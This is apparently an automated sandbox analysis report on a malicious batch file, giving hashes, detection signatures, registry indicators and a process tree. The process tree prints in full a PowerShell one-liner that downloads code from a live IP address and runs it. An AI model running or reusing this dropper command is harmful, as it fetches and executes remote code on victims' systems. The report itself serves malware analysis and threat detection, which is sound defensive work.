Analysis
-
max time kernel
125s -
max time network
133s -
platform
windows10_x64 -
resource
win10v191014 -
submitted
12-02-2020 12:10
Static task
static1
Behavioral task
behavioral1
Sample
xtSAHQY3.bat
Resource
win7v191014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
xtSAHQY3.bat
Resource
win10v191014
windows10_x64
0 signatures
0 seconds
General
-
Target
xtSAHQY3.bat
-
Size
197B
-
MD5
aa9afb0520c167913e548054c13559f1
-
SHA1
f6d844dac49a6dcd129bfcca531204bb1763c83f
-
SHA256
a2e505a398d475ddb2eb3e29ebde4b5f0706e31272b3e05cb807fa276fddd771
-
SHA512
ebe22fd1498a042a6ea69b1ababd78d7d0e630f4d86da7f031fc094358d0532876a9bf9ac3ab9dfa9b4645c095191f68990ed3687aa6a30dddae2150cdea890a
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/xtSAHQY3
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid process 4984 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 4984 WerFault.exe Token: SeBackupPrivilege 4984 WerFault.exe Token: SeDebugPrivilege 4984 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
Processes:
WerFault.exepid process 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe 4984 WerFault.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xtSAHQY3.bat"1⤵PID:4876
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/xtSAHQY3');Invoke-QSYBCPMYHAZCUT;Start-Sleep -s 10000"2⤵PID:4920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
- Enumerates system info in registry
PID:4984
-
\??\c:\windows\system32\taskhostw.exetaskhostw.exe -RegisterDevice -SettingChange -Full1⤵PID:4660